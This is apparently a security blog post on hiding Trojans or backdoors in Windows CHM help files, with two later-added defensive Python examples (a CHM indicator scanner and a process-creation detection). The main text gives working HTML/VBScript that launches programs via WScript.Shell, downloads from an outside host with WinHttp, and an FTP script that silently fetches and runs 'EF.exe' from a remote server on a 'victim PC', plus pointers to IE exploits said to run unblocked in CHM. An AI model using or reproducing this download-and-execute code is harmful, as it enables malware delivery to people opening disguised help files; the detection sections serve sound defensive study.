Execute with .CHM file.


Hi.

In this post I want to talk about execution with CHM files or, to be honest, how we can run a Trojan or backdoor in a CHM file. We will also talk a little about bypassing Script Protection in IE.

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine of CHM:

CHM runs HTML pages based on the Internet Explorer engine.

When you run "VBScript", "ActiveX" or "Object" in Internet Explorer 7 or higher, Script Protection (ActiveX Security Control) alerts the user and blocks the script.

While a CHM file is running, we can run and execute "Object" + "VBScript" + "JavaScript" without any error, but if our script includes an ActiveX control, we will see a basic alert.

Execute in CHM:

We need a program to create CHM files. I like to use WinCHM (free edition):

http://www.softany.com/winchm/

To edit VBScript (with an IDE):

http://www.vbsedit.com/

Offline Mode (Intro) :

With this object ID:

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call the "Windows Script Host Shell Object" with an object tag:

Example:
<html>
<object id="wsh"
classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<script>
// Backslashes must be doubled inside a JavaScript string literal
wsh.Run("c:\\windows\\system32\\calc.exe");
</script>
</html>

Or:

<HTML>
<SCRIPT>
// Runs a program with one parameter through WScript.Shell
function PROCJavascriptRunProgramParameter( programNameS, parameterS )
{
var shell = new ActiveXObject("WScript.Shell");
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + " " + parameterS, 1, false );
self.close();
}
</SCRIPT>
<BODY ONLOAD='PROCJavascriptRunProgramParameter( "C:/windows/system32/calc.exe", "names.nsf" );'>
</BODY>
</HTML>


Online Mode (Backdoor & Script Bypass Mode):

We have three steps to do:

1- Download the .EXE file (without user interaction).
2- Save the file on the victim PC.
3- Run it.

To download with VBScript I used these objects:

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

As in this example:

<script language=vbscript>
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://abysssec.com"
'Send request to URL
Http.Open "GET", URL, False
Http.Send
'Get response data as a byte array
BinaryGetURL = Http.ResponseBody
</script>
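
For triage of a suspect .chm, the extracted topic pages can be searched for the CLSID and ProgIDs named above. The following Python scanner is an added example, not part of the original post; the function names, category labels and sample pages are constructed for illustration.

```python
import re

# Indicators named in the post: the Windows Script Host Shell CLSID and the
# COM ProgIDs used to execute and download. Category labels are this example's.
SHELL_CLSID = "f935dc22-1cf0-11d0-adb9-00c04fd58a0b"
PROGIDS = {
    "wscript.shell": "exec",
    "microsoft.xmlhttp": "download",
    "msxml2.serverxmlhttp": "download",
    "winhttp.winhttprequest.5.1": "download",
    "winhttp.winhttprequest": "download",
}
CLASSID_RE = re.compile(r"classid\s*=\s*[\"']?clsid:\{?([0-9a-f-]{36})", re.I)
PROGID_RE = re.compile(r"(?:CreateObject|ActiveXObject)\s*\(\s*[\"']([^\"']+)", re.I)


def scan_topic(html):
    """Return sorted (category, indicator) findings for one topic page."""
    found = set()
    for clsid in CLASSID_RE.findall(html):
        if clsid.lower() == SHELL_CLSID:
            found.add(("exec", "clsid:" + clsid.upper()))
    for progid in PROGID_RE.findall(html):
        category = PROGIDS.get(progid.strip().lower())
        if category:
            found.add((category, progid.strip()))
    return sorted(found)


def verdict(findings):
    """Download plus exec in one topic matches the three steps in the post."""
    cats = {category for category, _ in findings}
    if {"download", "exec"} <= cats:
        return "download-and-execute"
    return "exec" if "exec" in cats else ("download" if cats else "clean")


# Constructed sample topics (not taken from any real CHM).
SAMPLES = {
    "intro.htm": "<html><body><h1>Setup guide</h1></body></html>",
    "calc.htm": '<object id="wsh" classid="clsid:F935DC22-1CF0-11D0-ADB9-'
                '00C04FD58A0B"></object><script>wsh.Run("calc.exe")</script>',
    "update.htm": '<script language=vbscript>\n'
                  'Set h = CreateObject("WinHttp.WinHttpRequest.5.1")\n'
                  'Set s = CreateObject("WScript.Shell")\n</script>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, verdict(scan_topic(body)), scan_topic(body))
```

The match is on literal strings only, so a clean result does not prove a topic is safe.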

SAVE FILE [Achilles heel in CHM]:

Save-file and execute objects run ActiveX in IE & CHM.

If you can find a way to bypass the ActiveX alert, you can find lots of bugs.

Example of a bug:

http://www.milw0rm.com/exploits/719 [2004]

[Screenshot: ActiveX alert]

Note: we have some bypass tricks; maybe we will disclose a few of them here soon.

But until that time you can use this method to download (FTP client):

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

'Change this, foldername = local dir (where files must be ftp'd TO)
strLocalFolderName = "c:\"

' Server where you are ftp'ing TO
strFTPServerName = "abysssec.com"

' Username you use to ftp
strLoginID = "test"

' Initialize variables
strPassword = "test"
strFTPServerDir = "/www"

' Change this to the folder where the files are on the source server
strFTPServerFolder = "/www"

'The following lines of code generate the FTP script file on the fly,
'because the directory name changes every time it's run

strFTPScriptFileName = strLocalFolderName & "\FTPScript.txt"

Set objFSO = CreateObject("Scripting.FileSystemObject")

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
'objMyFile.WriteLine ("ftp -s open " & strFTPServerName)
objMyFile.WriteLine ("open " & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

'strFTPServerDir = InputBox("Enter directory from which to ftp:")

'objMyFile.WriteLine ("cd " & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine ("cd " & strFTPServerFolder)
'objMyFile.WriteLine ("bin")
objMyFile.WriteLine ("lcd " & strLocalFolderName)
objMyFile.WriteLine ("get EF.exe")
objMyFile.WriteLine ("bye")
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

'The following code executes the FTP script. It creates a Shell
'object and runs the FTP program on top of it.
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run ("ftp -s:" & chr(34) & strFTPScriptFileName & chr(34))
'objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject("Scripting.FileSystemObject")
CleanPath="c:\"

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

To execute, you can use this:

<script language=vbscript>
set shell = CreateObject("WScript.Shell")
shell.run( "cmd.exe" )
</script>
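
On the endpoint, the snippets above surface as process creation: hh.exe (the HTML Help viewer that opens .chm files) or a script host starting cmd.exe or ftp -s:. The following Python detection is an added example, not from the original post; the event records are constructed and use Sysmon Event ID 1 field names, and the watched-process lists are assumptions to tune.

```python
import ntpath
import re

# hh.exe is the HTML Help viewer that opens .chm; wscript/cscript run .vbs files.
SCRIPT_HOSTS = {"hh.exe", "wscript.exe", "cscript.exe"}
# Children launched by the post's snippets; an assumption to tune per site.
WATCHED_CHILDREN = {"cmd.exe", "ftp.exe", "calc.exe"}
CHM_RE = re.compile(r'([a-z]:\\[^"]*?\.chm)', re.I)
FTP_SCRIPT_RE = re.compile(r'-s:"?([^"]+)', re.I)


def base(path):
    return ntpath.basename(path).lower()


def detect(events):
    """Flag watched children of a script host; extract the .chm and ftp script."""
    alerts = []
    for ev in events:
        parent, child = base(ev["ParentImage"]), base(ev["Image"])
        if parent not in SCRIPT_HOSTS or child not in WATCHED_CHILDREN:
            continue
        chm = CHM_RE.search(ev["ParentCommandLine"])
        ftp = FTP_SCRIPT_RE.search(ev["CommandLine"]) if child == "ftp.exe" else None
        alerts.append({
            "rule": parent + " -> " + child,
            "chm": chm.group(1) if chm else None,
            "ftp_script": ftp.group(1) if ftp else None,
        })
    return alerts


# Constructed events using Sysmon Event ID 1 field names (not real telemetry).
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\hh.exe",
     "ParentCommandLine": "explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\demo\ebook.chm'},
    {"ParentImage": r"C:\Windows\hh.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'"C:\Windows\hh.exe" C:\Users\demo\ebook.chm',
     "CommandLine": "cmd.exe"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\ftp.exe",
     "ParentCommandLine": r"wscript.exe C:\Users\demo\get.vbs",
     "CommandLine": r'ftp -s:"c:\\FTPScript.txt"'},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```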

——————————————————————————————————————————————-

Bypass Script Protection in CHM:

When you run this exploit [the latest IE 7 exploit at this time]:

http://www.milw0rm.com/exploits/7410

This exploit is detected by IE Script Security Protection. You can run this exploit in a CHM, and don't worry about execution through the "heap spray" method.

Test it:

http://abysssec.com/files/Execute-with-IE.chm

OK, deductions:

1- We can put a backdoor or Trojan in CHM files [fake book].

2- We can run IE exploits in CHM files.

3- We can execute, download and upload with CHM files.

4- We can run all COM & DLL objects with it.

In the future:

1- Talk about the heap spray method.

2- Talk about fuzzing OBJECT.

3- Talk about bypassing the ActiveX question in .CHM [if I find it!!!!]


Questions?

———————————————–

The abysssec comment problem is solved; feel free to write your comments and mail your requests and questions to us.

DAphne
